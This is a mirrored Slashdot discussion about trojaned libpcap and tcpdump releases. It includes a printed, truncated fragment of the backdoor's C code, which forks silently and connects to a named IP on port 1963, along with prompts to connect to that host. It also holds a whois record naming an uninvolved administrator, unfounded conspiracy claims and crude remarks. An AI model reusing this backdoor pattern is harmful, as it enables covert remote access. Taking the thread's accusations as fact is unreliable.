Slashdot Mirror
Trojan Found in libpcap and tcpdump
msolnik writes "Members of The Houston Linux Users Group discovered that the newest sources of libpcap and tcpdump available from tcpdump.org were contaminated with trojan code. HLUG has notified the maintainers of tcpdump.org. See our reports here or here."
What!? I didn't even know they were dating!
FP
... but great for Open Source.
Emerge doesn't get tcpdump source from tcpdump.org, but from ibiblio.org.
How did it get into tcpdump.org's sources exactly? The HLUG page isn't clear.
One of the flaws of open source in our current legal environment is that it appears to not matter much the ill intent of authors of such malevolent code. If there is no money involved, they get away with it.
I'd personally like to see them getting ass raped in a federal prison or the equivalent institution in a non-US locale. I'll keep dreaming.
HBI's Law: Frequency of calling others Nazis is directly correlated with the likelihood of the accuser being Communist.
apt-get update... : :-)
well, I have not installed these sniffing proggies, so it should be okay.
Now it could be worse
If you suspect your binaries to be trjanized, you'd want to sniff your own machine but if (and it is the case) the sniffer is trojanized, then it could possible hide such "activities"...
I actually read the article and it however seems that it was not the case here...
phew
Trolling using another account since 2005.
Who would have thought that TCPDUMP would have crap like that in it?
And if I don't remember, this happened befrore. Of course this is one of the biggest strenghts of the Open Source Model.
Code is constantly audited, checked and corrected. If your closed source software has backdoors or trojans...well....who knows but on Open Source is easyly detected.
Seems now more than ever the need to check the authenticity of your sources before installing.
As if security auditing wasnt a big enough headache already
-- If at first you don't succeed, lie!
Thats right, you have FAILED again. Worse, you were DEFEATED by an on topic post! Perhaps you should just give up and end this FAILURE of a life now.
I run a successful London-based dot com (yes, they do exist :) and we've been having to run around like headless chickens all day because of this.
Is it really too much trouble to do an MD4?
It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this.
not really a good show for open source...
I mean, I love open source code, but does it seem that it is more suscepticable to trojans being planted? I mean, any tom dick and harry can release code, and it may not be checked for things like this.
How about setting up an independent body of volunteers, who go through commonly used programs, and check for this sort of thing. Than they can issue some kind of certification or "stamp of approval" on that particular release. That way, a user can atleast tell that some basic source code scrutiny was done...
Any comments welcome...
So if you're like me, and you don't actually use the source code (just precompiled versions) then you've got no problem, right?
mirror 1 in italy mirror 2 in poland
blah blah blah... just don't feel like fscker dying all by itself. yadda yadda yadda, beowulf cluster hootie hoo, slashdot should cache unfta unf, I need head
It's not unusual at all in the Unix world. Pete's sake, K. Ritchie (he who invented Unix and C, or at least part of the team) put trojans into early versions of cc and login so that he could get accsess to _any_ unix system.
It worked with the trojaned compiler making bent versions of the login program. You couldn't detect it as if you compiled another version of cc or login from clean source the bent cc would infect that one and the cycle of infection continued. Very cleverly done.
Actually, for all you know maybe every version of gcc ever allows RMS and Torvalds into your box...
Trojan Found in libpcap and tcpdump
I swear, some of these source trees are worse than the canals of Venice.
Use them.
"I'd rather have a full bottle in front of me than a full frontal lobotomy"
The program connects to 212.146.0.34 (mars.raketti.net) on port 1963
With that information, I suppose that it is easy to find out which Finnish 'author' included the trojan, and would be simple to track him down. But my question is how something like this could have been included in an open source code and released to the general public?
-- 7 string electric violin + live loop samplers
This never used to happen. Now it is like as if someone is intentionally trying their luck to trojan open-source projects. The crack0r types usually try to claim some kind of responsibility to increase their m0j0, but I haven't heard of anyone doing so. Usually a crack0r will try to make the trojaning *bad* to further make themselves feel better, but these trojanings are often in name only, and are of no real security threat. I am wondering if this is an anti-freesoftware publicity ploy by some individual or group.
What good having 'pure' source code minus viruses, worms and trojans? MS showed the way with some Korean CDs infested with bugs. Can penguins be far behind?
If you keep throwing chairs, one day you'll break windows....
there's no-one to pay me to pay my staff for the lost man-hours caused by this.
But then again, you had to pay no-one for the man hours you saved by using the open-source code.
K. Ritchie? Are you getting confused by the K&R book? It's D. Ritchie, if memory serves.
what about winpcap?
Either that or someone has trojaned (is that a word?) his site!
The tojan contacts the following website:
http://mars.raketti.net/~mash/services
DNS Details:
Registrant:
Kuopion Puhelin Oyj (RAKETTI2-DOM)
KUOPIO, 70780
KUOPIO,70780
FI
Domain Name: RAKETTI.NET
Administrative Contact, Technical Contact:
Siltakoski Petri (SP730-ORG) admin@DOMAIN.RAKETTI.NET
Kuopion Puhelin Oyj
Levasentie 23
KUOPIO
FINLAND
+358-17-302329
Fax- +358-17-3614904
Record expires on 07-Oct-2004.
Record created on 08-Oct-1998.
Database last updated on 13-Nov-2002 08:36:01 EST.
Domain servers in listed order:
NS1.RAKETTI.NET 212.146.0.10
NS2.RAKETTI.NET 212.146.0.11
From excellent karma to terible karma with a single +5 funny post...
Seriously, though, I think the ideal solution would be to do multiple checks of the RC5 signature of newest packages, over several mirrors. The advisory mentioned that tcpdump.org was compromised, while the mirror at ibiblio.org was OK.
Or use Gentoo Linux. Of course. I can't do that, since I don't have broadband at home... =(
The right to offend is far more important than the right not to be offended. (Rowan Atkinson)
Isn't this one too many?
There was dsniff, BitchX, OpenSSH etc. and today tcpdump and libpcap?
Does anyone else think that someone has found a security hole in a popular unix daemon and is having some fun with it before notifying the authors. Or maybe there is a *VERY NASTY* exploit circulating privately?
At least that's what I think.
...could it be to search the repository for the insertion date?
so seeing as how there's no trojan cleaning program in linux, how does a person infected with the trojan rid his system of it? is it as simple as installing the non-trojan version?
I was just wondering how long these sources have been available with these many eyes making bugs shallow and so forth? I'm assuming it's less than 1 hour, because as I keep being told, everyone in the open source community checks all source code thoroughly before installing it, which is something that can't be done with closed source.
Somebody's been messing around there, don't you think?
Making trouble today for a better tomorrow...
the pages say the latest release(7.1) is vulnerable on some mirrors, but no mention is made of the libpcap-current tarball available on tcpdump.org
Sounds like a Texas conspiracy here!
Yeah! Let's nail his ass! ..
Oh wait, perhaps he's just the tech guy working for the company which registered the domain "raketti.net", Kuopion Puhelin. It's a telecom and net operator after all.
Think about this for a moment.
There is only one beneficiery if a trojan is succesfully released in an Open Source project.. and it's Microsoft.
Also, people should pay attention to where they get an how they distribute thier source. It doesn't take much to generate an md5
checksum. Come on!
Just make sure you get your source from the source,
and check the source against your md5 checksum.
Not a big deal.
This is a local ISP, a telephone company.
The good blackhats have lots of compromised machines at their disposal, and are generally way too clever to leave such an obvious clue behind.
It's possible that this guy has something to do with it, but it's more likely that his machine is owned by the same person who managed to put the trojan out there.
...wait...never mind.
Donate background CPU time to fight cancer.
...that this little incident will not be mentioned in the next edition of the Cathedral and the Baazar?
To make laws that man cannot, and will not obey, serves to bring all law into contempt.
--E.C. Stanton
Once again, Gentoo users wouldn't have had any problems, thanks to the wonderful portage system.
The trojaned code has been around for almost a year, from the project homepage (where most people would go for the source), and nobody spotted it.
It highlights the fact that a sizeable part of the open source user base either can't read code, or don't want to.
Yes and no. The information you have successfully received from the Whois database is pointing to the phone company in Finland, which happens to be a host for raketti.net domain. Petri Siltakoski is just an administrative contact of the ISP (Raketti.Net). He has nothing to do with the web page set up by an individual who seems to have an account in this ISP.
Siltakoski Petri is apparently just the guy who registered that domain. It could be that a user from that domain is involved or, as you said, that server has been r00ted. Funny, though, http://mars.raketti.net/~mash/services is nothing but a FreeBSD /etc/services file.
-- Never hit a man with glasses. Hit him with a baseball bat.
This was just sent ~1 min ago:
To : msolnik@hlug.org
Cc : wt-changes@wiretapped.net,
tcpdump-workers@tcpdump.org,
mcr@sandelman.ottawa.on.ca
Subject : tcpdump.org mirrors
----- Message Text -----
Hi guys,
I run the main mirror of tcpdump at wiretapped.net (no relation to wiretapped.us) in Australia. We rsync from cvs.tcpdump.org, and have removed the entire tcpdump.org tree and disabled rsync updates until we hear from Michael Richardson at tcpdump.org.
You may like to add this info to your Updates area, as the unavailability of the main mirror site may seem suspicious. It is not, as described above.
Because wiretapped.net itself is mirrored to a few other sites, it may take between 1 hour and 24 hours for this removal (and any subsequent re-addition) to take effect. We'll note when it goes back online at http://www.wiretapped.net/changelog.html
Hope this assists in preventing any further spread,
Grant
www.wiretapped.net
I admit to not knowing a lot about open source development, not being a developer myself. But I'm curious, is there any sort of legal accoutability when someone intentionally codes a trojan in to a piece of software? Is it possible to keep track of who is writing what code? When trojans, etc, are discovered, are you limited to just patching them and going from there, or is it usually possible to find out who did it and therefore be suspect of future code?
Buy the President
I have just started using Gentoo and have not finished reading through the docs yet. As such, I am unaware of how this problem would be avoided using Portage. Now if you referring to rolling back, then I understand that...
Who says geeks don't have condoms?
Or maybe not..
The whole Raketti.net seems to be a domain for a local telecom/ISP based in Kuopio, Finland (smallish town in east Finland). Petri Siltakoski is just probably their Admin.
They seem to be offering internet access with space for homepages, so Petri Siltakoski doesn't necessarily have to have anything to do with this..
touch -t 200112101200 newbie.c
I thought the whole idea of the GPL was that you could take a program and modify it to your own needs so long as you release the source back to the community under the same license.
Sounds like that's what happened here!
Two paths to greatness... that which slowly climbs to the top of the summit, with all its grueling hard work and requirement of tenacity and patience. Then there is the fast and easy way of being shot up by a cannon. Unfortunately for many you will knock much of the mountain and its traversers off, unfortunately for you what comes up must come down.
Beware the venture captalist, as he seeks to aim only at the short term then cash in and run like hell.
It isn't only a services file, if you scroll down you will find also some c source, which will be compiled on the fly.
The trojan code seems somewhat complex and unreadable at first glance. The variable names don't express much of the semantics. It even doesn't have any comments. No wonder no one notices if this kind of stuff is written into code. And this is very clear code.
/* Here's stuff for the trojan. */, but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.
Even (or especially) free software developers should use more descriptive variable names and comment their code well. It makes the code much more readable for analysis, both security or quality reviews.
Well, ok, crackers probably want to obfuscate their code with
I'd recommend the rule: "One comment per statement, except when really unnecessary." Many people think it's silly, but those people haven't had to read a lot of other people's code.
Hmm, I wonder why they used port 1963...author's birth year? Nah, that would be too old for a typical cracker.
When I first started to use open source software (back in '93), I always wondered how easy it would be to release compromised sources, whether intentionally or not.
Once I got into it, hey, I trusted these guys. They were the good guys. We were the good guys. The community was built on trust, and it worked.
We used to scoff when we heard about the torjans in the latest version of Microsoft Word. That would never happen to us... unless they sorted that WINE [wine.org] project out. ;-)
Now we face the same issues. As source distributions (I'm not discounting binary distributions - if you trust RedHat, that's your call) increase in popularity, this will become more of a problem.
We need to tighten up the procedures that we use. We need to ensure that the software we put out is the software that the users download and use. We need to ensure that nobody can comprimise our systems in this way.
Any fool can talk, but it takes a wise man to listen.
Dude? WTF is up with all these trojans recently? And why in the hell are the AUTHORS putting them in now? I know. It must be so they can send money to all their users. It couldn't possibly be devious. Everyone knows that all open source coders are God's greatest creations and deserve their own temples of worship, though nobody is to be worshiped above Linus. At least with Windows I don't have to worry about this, as if there are trojans I don't know about them. That way they don't affect me. Also, I'm not a communist hippie, so the government won't be tracking my movements. All I do is whack off to porn, much like the rest of the crowd here. But I do bathe ever day, so I guess that's something unique about me. I also think Nethack is HIGHLY over-rated. Also, a lot of you guys hate the MPAA, but still buy the fucking 4-DVD special edition set of Lord of the Rings (also known as "Some Queer Looking Guys Who Buttfuck Each Other Between Scenes." That about sums it up for now. I want to be a troll, but I'm just not dedicated enough.
Also feel free to telnet into mars.raketti.net port 1963 a couple hundred times (it returns M the first time and nothing after that).
Does anyone else have an issue with tcpdump.org NOT mentioning there sources were trojaned? It seems there should be some mention of "Hey if you trusted us and didn't verify checksums, you might want to..."
I really wonder how long it (the Trojan) has been in before anyone read the code discovered it.
... where were you wanking, didn't all of you read every f...g line of that program?
... whatever flame fire that remark may start!!! (instead of flaming, look at yourselves in the mirror and admit how sometimes your attitude is ridiculous considering computer)
Hey Slashdoters, you bunch of "I know better than you" people
HA HA!!!
This is just showing that the Open Source "Community" is not more immune than any other to that king of intrusion
The reason this is a problem is that nebulous shrug of an answer to the question "Who are you trusting to provide this code which you execute?" It could be an anonymous PGP/GPG key, but to violate people's trust would mean that trusted token is no longer trusted, and thus it would identify the other risks out there.
Imagine the tcpdump distributions were signed by an anonymous key. We could look over the code, and decide to trust that key. Later, people would be able to tacitly trust that key to sign tcpdump tarballs. One day, the tcpdump code will fail to match the signature: it will be caught before being executed, and the trojan will be discovered quickly. Later, another trojan will appear, but the signature will match. A few people will be bit, but the key will be exposed and others will be able to quickly identify their risk.
At the VERY LEAST, use MD5 sums on the files like FreeBSD ports!
--- Nothing clever here: move along now...
the article is called 'reflections on trusting trust' and Ken Thompson wrote it upon inception of the ACM distinguished scientist award. now, we all know you are full of shit (since you can't even spell his name right) but claiming that 'each version of login was compromised' is so far off base that it't not even funny.
follow the link posted already, read it and try to understand what he fundamentally tries to tell you. then go and read aleph1's 'smashing the stack for fun and profit' and try to get a glimpse of what 'hacking' was considered in the 80s.
sources that debian built these packages from have good checksums
: ~$ md5sum tcpdump_3.7.1.orig.tar.gz : ~$ md5sum libpcap_0.7.1.orig.tar.gz
rgoldber@supercomputer:~$ md5sum tcpdump_3.6.2.orig.tar.gz
6bc8da35f9eed4e675bfdf04ce312248 tcpdump_3.6.2.orig.tar.gz
rgoldber@supercomputer
03e5eac68c65b7e6ce8da03b0b0b225e tcpdump_3.7.1.orig.tar.gz
rgoldber@supercomputer
0597c23e3496a5c108097b2a0f1bd0c7 libpcap_0.7.1.orig.tar.gz
that's not true, look at it again ...
/. eats this code post ... ):
/dev/null 1>/dev/null
in the middle of the fuly commented services file, you find (let's hope
#!/bin/sh
cat >conftes.c
#include
#include
#include
#include
#define XOR_KEY 0x89
int main (int argc, char **argv)
{
char c;
int s, x, sv0[2], sv1[2];
struct sockaddr_in sa;
switch (fork ()) { case 0: break; default: exit (1);}
close (0); close (1); close (2);
do {
if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
exit (1);
sa.sin_family = AF_INET;
sa.sin_port = htons (1963);
sa.sin_addr.s_addr = inet_addr ("212.146.0.34");
alarm (10);
if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
exit (1);
if ((x = read (s, &c, 1))
nice, isn't it?
heheh
discussion site in discourages discussion shocker
This apparently misleading (albeit well-intentioned) comment gets modded +4 interesting, meaning that almost everyone will see this poor guy's name.
/. An early poster makes assumptions and gets modded way the hell up, then all the rebuttals pointing out he's talking out of an unreliable orifice wallow in the low point range.
All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.
And, by the way, this happens all the bl**dy time on
Yeah, I know it's off-topic. Just wanted to rant about something that irritates me. Return to your normally-scheduled bits and pieces.
Look more closely -- right in the middle of the file is C source code for the trojan.
hmmm of course /. didn't eat it completely. but go and look for yourself for the full code.
they were practicing safe sex
well, I have not installed these sniffing proggies, so it should be okay.
Darn... apt-get even makes your box more secure than before even if you haven't actually installed the bad packages? This must be the Holy Grail! And it should be okay? Not only that you have not installed tcpdump and libpcap, what definitely makes it okay, you don't even trust apt-get to really solve your (non-existing) problem... Now I wanna join the apt-get cult... Where can I register?
I bet you recommend penicillin over other medicine even when you got no infection! Or do you use apt-get then as well? Doesn't make any difference anyway...
(For the record: I use Debian GNU/Linux among other stuff...)
Does anyone know if the RedHat binaries are ok?(7.3/8.0)
This was quite a dissillusion for me. I feel so dirty. Gonna take a long shower.
Because I used the current tar ball Friday afternoon and it shows no sign of the trojan.
Do this: Download gpg from gnupg.org. Build it. Generate yourself a key. Try to get some of your friends to sign it. submit it to keyserver.net. Sign your code with that key. While you're at it, start using kmail, evolution, or mozilla with enigmail and start signing your emails too. Do it religiously.
Check sigs when you download code too.
Slackware 8.1 was released this past summer, so I'm wondering whether its tcpdump-3.7.1-i386-2 is infected.
Can anybody tell me whether checking for "mars", "mash" etc. in the output from "strings tcpdump" or "strings libpcap.a" is sufficient to show evidence of the trojan?
..that would actually be Petri Siltakoski and not the other way around..
The posted MD5's for libpcap and tcpdump indicates that at least the sunfreeware version is OK.
http://www.sunfreeware.com/md5.html
What does the article imply with "ADM. Hmmm..."?
...as a rocket scientist I feel most compelled to answer& cid=4658776
d =4658433
i d=4658097
1 28&cid=2238414
i d=2207372
i d=2204471
i d=2204422
http://slashdot.org/comments.pl?sid=44937
...I run a successful London-based dot com
http://slashdot.org/comments.pl?sid=44933&ci
... As a lawyer myself, I can state that
http://slashdot.org/comments.pl?sid=44912&c
... I'm an avid open-source supporter
http://slashdot.org/comments.pl?sid=21
...I am an avid supported of the open-source movement [sounds familiar? that's because it is -ed]
http://slashdot.org/comments.pl?sid=20824&c
...I'm an avid supported of the open source movement [we know -ed]
http://slashdot.org/comments.pl?sid=20761&c
... I am a passionate supported of the open-source movement [geez -ed]
http://slashdot.org/comments.pl?sid=20760&c
Enjoy your job, make lots of money, work within the law. Choose any two.
irssi
fragroute, dsniff, fragrouter
BitchX
This message says Recently there have been a spat of well publicized attacks against what I would consider to be the backbone of the open source movement - it's source code distribution system. Hackers have been penetrating people who download, say, OpenSSH and then compile it to use on their systems by trojaning OpenSSH itself. This strikes at the very HEART of Open Source by making the act of installing the software a weakness. Because Open Source has no one distribution point, there are many places for someone to verify if they want to install software securely. Because there are no vendors, the sites people download software from are usually not provided with a dedicated security staff.
This is serious, guys and gals. Use the source, Luke - but what if I can't trust the source any more? Open Source has to find a method to get around this problem; see this post.
"There are already a million monkeys on a million typewriters, and Usenet is NOTHING like Shakespeare." - Blair Houghton
I'm just typing out loud here.
Yes, there'd almost certainly have to be a cost associated with this, and I'd think it would be paid by the people who wanted source code, but didn't want to have to worry about checking it for Trojans etc..
The source could still be publically available for comment and review to add to those being paid to perform the analysis.
Seems like this might be a good service, once the idea is fleshed out more...
There'd also need to be some definition of "guaranteed" (or maybe just a different word :0) that fit this scenario, most people don't want to set themselves up to be sued.
Give a hand, not a hand-out.
Note that THE DATE ON THE FILE DOESN'T MATTER. It was trojaned last night, not last year.
The fact that someone so ineptly trojaned the source, not even bothering to generate a new md5sum, suggests that it's someone out to make it obvious looking. Someone who has a reason to discredit open source. Someone like a former script kiddie employed by microsoft...
Never mind that russian crackers were wondering round MS servers for MONTHS back in 2000...
All it does it retrieve a /etc/services file from that website.
Heh, I had only looked at the first few lines or so, and didn't think anything of it. Did anyone look in the parent directory from where that services file is? Or if the trojan gets any other files besides services?
-- Never hit a man with glasses. Hit him with a baseball bat.
I downloaded and installed (On a customer's machine even!) the file http://www.tcpdump.org/release/libpcap-0.7.1.tar.g z back on October 24th (The link still shows up in the "visited" color in my browser even). My md5sum is 0597c23e3496a5c108097b2a0f1bd0c7, and inspection of the config script and gencode.c show no signs of the evil code.
So the trojan'd version has not been sitting there too long.
Having source code freely available doesn't imply security. Ken Thompson demonstrated this very eloquently in his paper.
I'm telling you, this is Microsoft's new tactic for attacking open source. Make people afraid of it, and they will run in terror.
Scary, very scary.
In the meanwhile, I suggest that you run all your untrusted software in a sandbox like Systrace which is available for the BSDs and Linux.
This screenshot shows Dug Song detecting the trojan in the Fragroute distribution. Systrace allows you to run completely untrusted applications in a sandbox. The security policy is created on the fly with the user deciding what an application is allowed to do.
We need to be much more careful about the software that we run.
login as root (or whoever can run tcpdump)
/. your local rooted base. /usr/bin/tcpd echo 'A' (i think that was the quit code)
/. editor)
tcpdump -n host 212.146.0.34 &
telnet 212.146.0.34 1963
if tcpdump sees the connection since it isn't ignoring port 1963, if you don't see the connection, then your tcpdump is ignoring port 1963
and well, its always nice to
the people at 212.146.0.34 should change it to something like
if this test is wrong, well, so be it, i'm still new at this linux thing, but i'm better at linux then i am at spelling (boy, i should be an
--Anonymous Coward
I moved the binaries on the tcpdump.org web site, so that the "download" links won't work.
"ls -c" says that the modified binaries were installed at Nov 11 10:14:00 2002 GMT.
Preliminary inspection says that the CVS repository is O.K.
What you're saying is perfectly valid, but what if I use common sounding variable names to make it appear as if I was doing something I wasn't? Even with MOST good programmers, they aren't ever trained to debug code in this manner (I know a few CS exams do, for sure, but I have NEVER seen a huge project train people for this).
How about this:Lets start a few grassroots projects (doesn't matter how many) and work on educating people to read obfuscated code. Identify when strtok, fopen, etc etc is and is not doing harmful things to data - when it may indeed be doing something nefarious.
I started a site myself here to help myself start explaining simple stuff.. and eventually will work up to writing drop-in replacement libraries for other programs, or perhaps ways to trojan executables in memory you might have have control over (ptrace?).
Lets all learn a bit, and share the knowledge.
[plug]Damn my sig makes strange sense now[/plug]
"During times of universal deceit, telling the truth becomes a revolutionary act" -- George Orwell
Interesting that there is no mention of this on the tcpdump.org website, one would think they would at least post something about it.
Don't think for a second that Microsoft hasn't put back
Microsoft *have* inserted a backdoor into the CryptoAPI for the NSA.
I know this is a stupid question but I don't understand how this ended up in the distribution in the first place.
To ensure perfect aim, shoot first and call whatever you hit the target
You are partially correct.
If you download the author's public key today when you install widget 2.3 and tomorrow Tom Blackhat replaces both the author's public key and places a trojaned widget 2.4 you will catch it when you do the upgrade because you got the legitimate key prior to it's replacement. Only new downloaders will be screwed.
Obviously it is still better to place the public key in a secure location separate from the files but there is some use to the key system even if the key is replaced later.
Coding Blog
This isn't the first post of this type of thing with open source and I've always wondered if it's a big deal when I see them.
But I think I finally get the difference between Closed Source and Open Source with regards to evil code:
Closed Source with Intentional Evil Code = Law Suit
Open Source with Intentional Evil Code = Tough Luck
I know the rebuttal is - "with open source, you can find the evil code, you have more eyes looking to find that evil code" but as it has been noted in this thread, how long has it been there? A year, more? Plus look at the number of almost anonymous (if not completely anonymous) contributors to the code. Closed Source doesn't have that liability.
Sorry but this one goes grudgingly to the Close Source win column.
I downloaded and installed libpcap and tcpdump on Nov 1. The versions I have came from tcpdump.org. md5sum shows that they have the correct checksum and not the trojaned checksum as reported on the Houston LUG page. A grep of the sources for the port number and ip found in the trojan reports null. It looks like the trojan files were placed on tcpdump.org after Nov 1, 2002.
FreeSpeech.org
When was the last time Microsoft paid you when a security hole was found in their product. YOU should have got your admins to verify the checksums before installation. The parent poster is a troll
MD5 checks work nicely. Sure pgp in theory is better but since md5's are cached locally, and a helluva lot faster to check the chances that they will actually be used and verified are seemingly quite good.
Which is to say in practice MD5 has caught rather a lot of these problems, and in quite timely manner.
As irrelevant as various source-distributions (e.g. lunar, source-mage and Gentoo) are at present in other respects, they make a nice 'canary' in the coal mine :-).
Linux is Linux, if One need clarify their dist: <Dist>/GNU Linux
bsds are of course just BSD
I don't mean to troll (and I hear you say "yeah but you are") BUT quite a few project sites seem to have been infused with trojaned downloads over the last few months. Actually makes you think if there is a certain person or organization behind this? Considering the fact that news like this give these projects a bad security reputation, which counter-balances the built-in security breaches of a certain commercial software giant just nicely. Just a paranoid thought, don't take it too seriously though (I know you won't but still).
FreeBSD (don't know about other BSDs) stores the checksums either locally when installing the ports-collection or onto another server just like gentoo.
Nah probably not...
Strange women lying in ponds distributing swords is no basis for a system of government.
That's why we need a new moderator point:
-1 Caps Lock Title
"All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.
/. An early poster makes assumptions and gets modded way the hell up, then all the rebuttals pointing out he's talking out of an unreliable orifice wallow in the low point range."
And, by the way, this happens all the bl**dy time on
You mean like yours?
and it's not the only one found today, nor in the past week... good to see that slashdot is finally reporting on this stuff.
To all those who think linux is safe and secure... guess again. It's just that you guys spend more time writting viri and looking for 'sploits' in MS code than MS code jockeys do with linux... until now. That and the 9 to 1 ratio of users.
Isn't read-only hardware the simplest answer for this kind of attack?
If the files are coming from a CD-R, there's no trojan. Period.
Of course CD-Rs are too small for many sites. How practical is it to write-protect a HD?
Question: Since this guy is identifiable..why not have Finnish govt. start looking with him. (Of course, I realize that he may not be the actual perp...but...)
Did those virii come distributed with the product? Now you're going to tell me there are ABSOLUTELY NO possible security holes in open source software, ever right? Go on...
Ignoring the fact that installing certain operating system components are often worse on your computer than a virus (by installing this service pack, we may enter your computer)...
Nothing is 100% secure, and nobody ever said linux is (or not anyone intelligent, anyways). However, tallies of response time when a breach is found, and often the time in finding such a breach, are the factors at hand. You'll certainly not see MS yelling out "hey, we were hacked, check your software people," but instead something more like a quiet, um... something wrong... here patch... you fix.
And yes, lots of MS tools come with bugs in them that leave your computer so open that you might as well just invite half the web for a party. Once MS gets the patch out, if you're a decently intelligent admin/user, you can fix things up to plug the hole, or meanwhile just disable affected components,etc.
MS isn't all the problem, idiots who don't patch up are also a problem (demonstrated by the continual code red attempts shown in my webserver logs), but at least when something goes wrong we hear about it, and can expect a solution shortly after discovery.
You said: "People using source for security who are in category 1 or 2 are fooling themselves."
Not quite. Here's why:
When you trust a binary, you are trusting the builder of that binary, the system on which it was built, AND the source of the source (i.e. the CVS repository or other ultimate source of the code, and all the source delivery mechanisms and servers like FTP). When you use the source directly, you remove one more trusted item from the list. Just like the builder of the binary, you trust the source of the source, but you build it on your own system which supposedly you trust more than someone elses.
For projects that build and provide binaries directly, there may be some trust overlap between who is the builder of the binary and the source of the source.
I generally agree, however, that if you are in category 1 or 2, you are a fool to think you are totally safe. But it is NOT equal to users of binaries since you do remove a middleman of sorts that binary users must trust.
I guess he may be one of those poor sods who got their Unix sysadmin training through this.
"There are already a million monkeys on a million typewriters, and Usenet is NOTHING like Shakespeare." - Blair Houghton
Maybe somebody has already posted this idea as a project on sourceforge..
There have been too many of these incidents lately, and it's giving OSS a bad odor. We must be carefull. Telling the rest of the world closed binaries are infected often as well does not help. The damage is already done.
This is my idea to prevent most of these jokers tricks.
In stead of placing the checksums next to the source on the same server we nead to place it some where safe. A number of centralized servers with a sole purpose to serve these sums, in several locations, on preferably differend operating systems. This combined with the use of eg PGP.
All distro's, for those who have not already, must apply a simple program ala portage and apt that checks against multiple PGP-key servers before the build commenses.
Now, how to make sure the admin of the project is the one signing the source on his machine.............
Why are other peoples sig's always more witty ???
The discussion we started last night on the Gentoo bugs forum has some good information.
http://bugs.gentoo.org/show_bug.cgi?id=10663
Thanks again to Matt, Scott, and Bruce for the help doublechecking my work and posting the warning.
Demo / Russell
... Or you could join the Thawte web of trust and use S/MIME. The advantage there is that even if you do nothing more than sign up, your e-mail address is verified to belong to you. That alone is more rigorous verification than anything you're guaranteed with a PGP key. Get notarized twice, and your certificate can have your name in it, and those who get e-mail from you will know *exactly* what identity assurance the signature implies. The same can't be said with a signed PGP key. Plus with S/MIME, there is a key expiration mechanism, which insures that the key can't (reasonably) be brute-forced before it becomes useless.
S/MIME support is also more widespread. Why does that matter? Because more folks would be in a position to verify the signature. If you put a link on a download page to an S/MIME message with a mime-type of message/rfc822, browsers that support S/MIME (at least netscape, mozilla, I believe IE) will verify the signature and display the contents with a nice "signed" icon. The contents of the message would be the MD5 sums of the files.
~~~
This is not the first time that things like this is happaning, ms make this not once! Open source always a bit dangerious, because there is no one who is responsible for it. But what does Ms with it? The question is, who needs to protect us? We have to do it every time and every way? Or the distributer? the company who make the code? Maybe we will need a community or committee for testing the source? :))
I thik if I give you a code I should be check it before I give it to you! And I think this is the only way which can work!
People, company who give out code with infections will write there name to the big black list.. as it happaned with ms!
So? Who what?
There is only one good solution: The simpliest!
The year rings a bell..
(a) The year of inauguration of the Apollo Space Program
(b) The year of the Afghan reconstitution
(c) Martin Luther King delivers the "I have a dream" speech.
Here
More here
The mantra of Open Source (Many eyes on the code) is nothing but marketspeak. In reality virtually noone ever looks at the code. Couple that with a development staff of the same people that write viruses and all of Open SOurce becomes one big time bomb.
This here is also interesting.
...well? Please to release the info and name the bank and name the program. You are FOR crooks or AGAINST crooks, and releasing the info of this backdoor is a good thing to do. If it's really there, it most likely is *illegal* so any sort of nondisclosure noise is null and void, AFAIK. You DON'T have to cover up illegalities, in fact you are supposed to report them. This bank and it's bogus officers and "bosses" needs to see the light of day in a fed courtroom.
Is there any tool to analyze source code as an antivirus scans a binary file?
For example, in this case, the program is running an external app and making changes to a system file.
This is the first kind of thing I would see if I audit the code quickly.
we should divorce tcpdump.org and take half their money. at least that was my punishment when my wife found a Trojan in my car.
TRUSTED COMPUTING!
By locking up the code so no one will ever ever be able to see what it really is, then we can INSURE that people get safe code that runs like a happy little gerbil! Yes!
It's not that simple. Sure, if all you're looking to do is execute some code and THEN give the user their expected interface, then that will work half-acceptably. However, you could not use this as a way to, say, discretely intercept logins and passwords, transfer account balances, read someone's database, or what have you since all of that requires you to intercept things and still provide the user with acceptable responses (at least if you wish to avoid detection for more than a couple runs). Now you might attempt to come up with some elaborate scheme to act as an interactive go-between between the actual application and the your trojan, but then you've greatly increased the complexity and the odds of detection.
No. There is a huge difference.
This is great, you've learned how to spin an argument.
Not only have you used the cliche "Well they aren't any better either...", you've even taken one step further and declared this weakness as your greatest strength.
Although to be an expert spin-meister you should have blamed this on Microsoft some how. Work on it, get back to us. Maybe we can get you a job at the Whitehouse if the tech market continues to flounder.
..and the new 5.0 is SOOO secure
Wow,... the story made it almost an hour before someone blamed Microsoft!
"It takes considerable knowledge just to realize the extent of your own ignorance." - Thomas Sowell
Maybe I'm retarded, but the articles do not mention when they think the trojan was introduced. Does anyone know?
Download gpg from gnupg.org. Build it.
According to the GnuPG web site, building GnuPG on Windows 2000 requires a "special setup," which I take to mean Cygwin. I currently use MinGW because I have had trouble getting Cygwin to work. What OpenPGP compatible software package do you recommend for users of Windows operating systems?
Will I retire or break 10K?
Yeah.... that's why wiretapped.us redirects to wiretapped.net...
are either:
1) an ignorant fuckwit
or
2) a lying fuckwit
well, which one is it?
Microsoft, or some other groupp that has an ax to grind against Free and OSS, is behind these trojans.
The goal? To do this exact thing to the Linux kernel or perhaps the samba project. They badly want to discredit Linux, and they will attempt to do so by any and all means. Call me paranoid, but what I say is true.
We must counter this life-threatening attack quickly or it will be a huge set-back or perhaps the begining of the end of free and OSS software.
That damn RPM format changes every other day.
My download from 9/28 2002 is okay.
tcpdump from 8/29 is good too.
Check this post to the netbsd-users mailing list (emphasis mine) :
From: David Maxwell
To: Stefan Schumacher
Cc: netbsd-users@netbsd.org
Subject: Re: Trojans in libpcap and tcpdump
Date: Wed, 13 Nov 2002 14:39:05 -0500
Sender: netbsd-users-owner@netbsd.org
User-Agent: Mutt/1.4i
On Wed, Nov 13, 2002 at 06:52:38PM +0100, Stefan Schumacher wrote:
> Hi there,
>
> report was given that trojans were detected in libpcap and tcpdump.
>
> http://hlug.fscker.com/
>
